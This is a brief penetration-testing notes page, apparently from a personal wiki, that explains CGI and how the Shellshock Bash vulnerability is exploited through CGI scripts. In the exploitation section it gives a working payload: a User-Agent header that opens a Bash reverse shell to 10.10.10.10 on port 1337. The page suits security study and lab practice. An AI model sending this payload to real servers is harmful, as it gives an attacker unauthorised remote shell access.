index

Common Gateway Interface

The Common Gateway Interface (CGI) is a standard protocol used for web servers to execute external programs and generate dynamic web content. It acts as a bridge between the web server and applications written in languages such as Perl, Python, Bash, or C.

How CGI Works:

A user requests a webpage that triggers a CGI script (e.g., http://rezydev.xyz/cgi-bin/script.py).
The web server executes the script and provides it with input parameters (e.g., form data).
The script processes the input, performs necessary operations (e.g., querying a database), and generates output.
The output (usually in HTML format) is sent back to the web server, which delivers it to the user’s browser.

success

Scripts are commonly stored at /cgi-bin/ endpoint.

Shellshock

Shellshock (CVE-2014-6271 and related CVEs) is a critical security vulnerability in GNU Bash (Bourne Again Shell) that allows an attacker to execute arbitrary commands on a vulnerable system. The flaw occurs because Bash improperly processes environment variables, enabling attackers to inject and execute malicious commands.

Shellshock becomes extremely dangerous when exploited through CGI scripts on web servers. Many web servers use Bash scripts to process user input via CGI, making them susceptible if they pass untrusted input to Bash.

Enumeration & Exploitation

Hunt for files like http://rezydev.xyz/cgi-bin/script.cgi using fuzzing methods.
After we find the script, we can try adding shellshock payload in User-Agent header.

### User-Agent: () { :; }; PAYLOAD-HERE
User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.10.10/1337 0>&1 # rev-shell

Apache Tomcat CGI

tomcat-cgi.md

Common Gateway Interface​

How CGI Works:​

Shellshock​

Enumeration & Exploitation​

Apache Tomcat CGI​

Common Gateway Interface

How CGI Works:

Shellshock

Enumeration & Exploitation

Apache Tomcat CGI